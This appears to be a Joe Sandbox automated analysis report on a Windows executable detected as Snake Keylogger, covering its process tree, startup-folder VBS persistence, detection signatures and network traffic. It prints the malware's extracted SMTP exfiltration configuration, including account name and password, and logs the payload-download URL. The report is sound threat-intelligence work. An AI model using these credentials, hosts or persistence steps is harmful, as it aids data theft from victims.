Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LAQfpnQvPQ.exe

Overview

General Information

Sample name:LAQfpnQvPQ.exe
renamed because original name is a hash value
Original sample name:b5d25a995424fd4d4fe5303ca4e90ceeb2794989f58213bda32b29c8716c5cfb.exe
Analysis ID:1562379
MD5:08565a4a256fb8f4f3497c695991829f
SHA1:b2c4d59213108fe33197e3685b1602f56047f62c
SHA256:b5d25a995424fd4d4fe5303ca4e90ceeb2794989f58213bda32b29c8716c5cfb
Tags:cia-tfexeuser-JAMESWT_MHT
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AntiVM3
Yara detected Snake Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Drops VBS files to the startup folder
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • LAQfpnQvPQ.exe (PID: 5144 cmdline: "C:\Users\user\Desktop\LAQfpnQvPQ.exe" MD5: 08565A4A256FB8F4F3497C695991829F)
    • LAQfpnQvPQ.exe (PID: 6364 cmdline: "C:\Users\user\Desktop\LAQfpnQvPQ.exe" MD5: 08565A4A256FB8F4F3497C695991829F)
  • wscript.exe (PID: 5540 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • ishon.exe (PID: 2888 cmdline: "C:\Users\user\AppData\Roaming\ishon.exe" MD5: 08565A4A256FB8F4F3497C695991829F)
      • ishon.exe (PID: 6184 cmdline: "C:\Users\user\AppData\Roaming\ishon.exe" MD5: 08565A4A256FB8F4F3497C695991829F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "sendpcamill@juguly.shop", "Password": "rEBS93U9rKLG", "Host": "juguly.shop", "Port": "587", "Version": "5.1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2515782521.0000000004351000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000007.00000002.3315771924.0000000003159000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000000.00000002.2244743417.00000000076A0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000005.00000002.2515782521.00000000041C1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000005.00000002.2515782521.00000000041C1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
            Click to see the 37 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.2.ishon.exe.43511c0.0.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              7.2.ishon.exe.400000.0.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
                0.2.LAQfpnQvPQ.exe.76a0000.6.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  5.2.ishon.exe.4228890.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    5.2.ishon.exe.4228890.2.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
                      Click to see the 25 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: WScript or CScript Dropper
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs" , ProcessId: 5540, ProcessName: wscript.exe
                      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs" , ProcessId: 5540, ProcessName: wscript.exe

                      Data Obfuscation

                      barindex
                      Sigma detected: Drops script at startup location
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\LAQfpnQvPQ.exe, ProcessId: 5144, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-25T14:59:25.057130+010028033053Unknown Traffic192.168.2.549724172.67.177.134443TCP
                      2024-11-25T14:59:28.002851+010028033053Unknown Traffic192.168.2.549732172.67.177.134443TCP
                      2024-11-25T14:59:31.118745+010028033053Unknown Traffic192.168.2.549739172.67.177.134443TCP
                      2024-11-25T14:59:52.091612+010028033053Unknown Traffic192.168.2.549798172.67.177.134443TCP
                      2024-11-25T15:00:01.235169+010028033053Unknown Traffic192.168.2.549824172.67.177.134443TCP
                      2024-11-25T15:00:12.752103+010028033053Unknown Traffic192.168.2.549851172.67.177.134443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-25T14:59:20.605221+010028032742Potentially Bad Traffic192.168.2.549712193.122.130.080TCP
                      2024-11-25T14:59:23.433379+010028032742Potentially Bad Traffic192.168.2.549712193.122.130.080TCP
                      2024-11-25T14:59:26.280113+010028032742Potentially Bad Traffic192.168.2.549727193.122.130.080TCP
                      2024-11-25T14:59:48.136512+010028032742Potentially Bad Traffic192.168.2.549789193.122.130.080TCP
                      2024-11-25T14:59:50.308425+010028032742Potentially Bad Traffic192.168.2.549789193.122.130.080TCP
                      2024-11-25T14:59:53.464717+010028032742Potentially Bad Traffic192.168.2.549802193.122.130.080TCP
                      2024-11-25T14:59:56.511566+010028032742Potentially Bad Traffic192.168.2.549814193.122.130.080TCP
                      2024-11-25T14:59:59.495922+010028032742Potentially Bad Traffic192.168.2.549821193.122.130.080TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 00000005.00000002.2515782521.00000000041C1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "sendpcamill@juguly.shop", "Password": "rEBS93U9rKLG", "Host": "juguly.shop", "Port": "587", "Version": "5.1"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\ishon.exeReversingLabs: Detection: 55%
                      Multi AV Scanner detection for submitted file
                      Source: LAQfpnQvPQ.exeReversingLabs: Detection: 55%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\ishon.exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: LAQfpnQvPQ.exeJoe Sandbox ML: detected

                      Location Tracking

                      barindex
                      Tries to detect the country of the analysis system (by using the IP)
                      Source: unknownDNS query: name: reallyfreegeoip.org
                      Source: LAQfpnQvPQ.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49716 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 192.168.2.5:49739 -> 172.67.177.134:443 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49792 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 104.21.1.182:443 -> 192.168.2.5:49710 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.1.182:443 -> 192.168.2.5:49746 version: TLS 1.2
                      Source: LAQfpnQvPQ.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: LAQfpnQvPQ.exe, 00000000.00000002.2241775942.0000000006A10000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: LAQfpnQvPQ.exe, 00000000.00000002.2241775942.0000000006A10000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: LAQfpnQvPQ.exe, 00000000.00000002.2244898671.0000000007700000.00000004.08000000.00040000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000043C5000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: LAQfpnQvPQ.exe, 00000000.00000002.2244898671.0000000007700000.00000004.08000000.00040000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000043C5000.00000004.00000800.00020000.00000000.sdmp
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 4x nop then jmp 069FA49Ah0_2_069FA430
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 4x nop then jmp 069FA49Ah0_2_069FA420
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 4x nop then jmp 069FA49Ah0_2_069FA5DE
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 4x nop then jmp 069F443Dh0_2_069F4270
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 4x nop then jmp 069F443Dh0_2_069F4260
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 4x nop then jmp 069F3BA7h0_2_069F3B38
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 4x nop then jmp 069F3BA7h0_2_069F3B48
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 4x nop then jmp 02D2F206h3_2_02D2F017
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 4x nop then jmp 02D2FB90h3_2_02D2F017
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_02D2E538
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_02D2EB6B
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_02D2ED4C
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 4x nop then jmp 05AE8945h3_2_05AE8608
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 4x nop then jmp 05AE8459h3_2_05AE81B0
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 4x nop then jmp 05AE5441h3_2_05AE5198
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 4x nop then jmp 05AE7BA9h3_2_05AE7900
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 4x nop then jmp 05AE0FF1h3_2_05AE0D48
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 4x nop then jmp 05AE8001h3_2_05AE7D58
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 4x nop then jmp 05AE7751h3_2_05AE74A8
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 4x nop then jmp 05AE0741h3_2_05AE0498
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 4x nop then jmp 05AE0B99h3_2_05AE08F0
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 4x nop then jmp 05AE02E9h3_2_05AE0040
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 4x nop then jmp 05AE72FAh3_2_05AE7050
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]3_2_05AE33A8
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]3_2_05AE33B8
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 4x nop then jmp 05AE6E79h3_2_05AE6BD0
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 4x nop then jmp 05AE65C9h3_2_05AE6320
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 4x nop then jmp 05AE6A21h3_2_05AE6778
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]3_2_05AE36CE
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 4x nop then jmp 05AE6171h3_2_05AE5EC8
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 4x nop then jmp 05AE58C1h3_2_05AE5618
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 4x nop then jmp 05AE5D19h3_2_05AE5A70
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 4x nop then jmp 0762A72Ah5_2_0762A6C0
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 4x nop then jmp 0762A72Ah5_2_0762A6B0
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 4x nop then jmp 076242CDh5_2_07624100
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 4x nop then jmp 07623A37h5_2_076239C8
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 4x nop then jmp 07623A37h5_2_076239D8
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 4x nop then jmp 0762A72Ah5_2_0762A86E
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 4x nop then jmp 076242CDh5_2_076240F0
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 4x nop then jmp 0155F1F6h7_2_0155F007
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 4x nop then jmp 0155FB80h7_2_0155F007
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h7_2_0155E528
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 4x nop then jmp 06BB8945h7_2_06BB8608
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 4x nop then jmp 06BB65C9h7_2_06BB6320
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 4x nop then jmp 06BB6171h7_2_06BB5EC8
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 4x nop then jmp 06BB58C1h7_2_06BB5618
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 4x nop then jmp 06BB6A21h7_2_06BB6778
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 4x nop then jmp 06BB7751h7_2_06BB74A8
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 4x nop then jmp 06BB0741h7_2_06BB0498
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 4x nop then jmp 06BB8001h7_2_06BB7D58
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 4x nop then jmp 06BB0FF1h7_2_06BB0D48
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 4x nop then jmp 06BB5D19h7_2_06BB5A70
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_06BB33B8
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_06BB33A8
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 4x nop then jmp 06BB6E79h7_2_06BB6BD0
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 4x nop then jmp 06BB0B99h7_2_06BB08F0
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 4x nop then jmp 06BB72FAh7_2_06BB7050
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 4x nop then jmp 06BB02E9h7_2_06BB0040
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 4x nop then jmp 06BB8459h7_2_06BB81B0
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 4x nop then jmp 06BB5441h7_2_06BB5198
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 4x nop then jmp 06BB7BA9h7_2_06BB7900

                      Networking

                      barindex
                      Yara detected Generic Downloader
                      Source: Yara matchFile source: 5.2.ishon.exe.4228890.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LAQfpnQvPQ.exe.41c8bb8.1.raw.unpack, type: UNPACKEDPE
                      Source: global trafficHTTP traffic detected: GET /12e2f2f2315804d08baebc78b9269ad1.mp3 HTTP/1.1Host: cia.tfConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /12e2f2f2315804d08baebc78b9269ad1.mp3 HTTP/1.1Host: cia.tfConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
                      Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: checkip.dyndns.org
                      Source: unknownDNS query: name: reallyfreegeoip.org
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49712 -> 193.122.130.0:80
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49727 -> 193.122.130.0:80
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49789 -> 193.122.130.0:80
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49821 -> 193.122.130.0:80
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49814 -> 193.122.130.0:80
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49802 -> 193.122.130.0:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49732 -> 172.67.177.134:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49724 -> 172.67.177.134:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49739 -> 172.67.177.134:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49798 -> 172.67.177.134:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49824 -> 172.67.177.134:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49851 -> 172.67.177.134:443
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49716 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 192.168.2.5:49739 -> 172.67.177.134:443 version: TLS 1.0
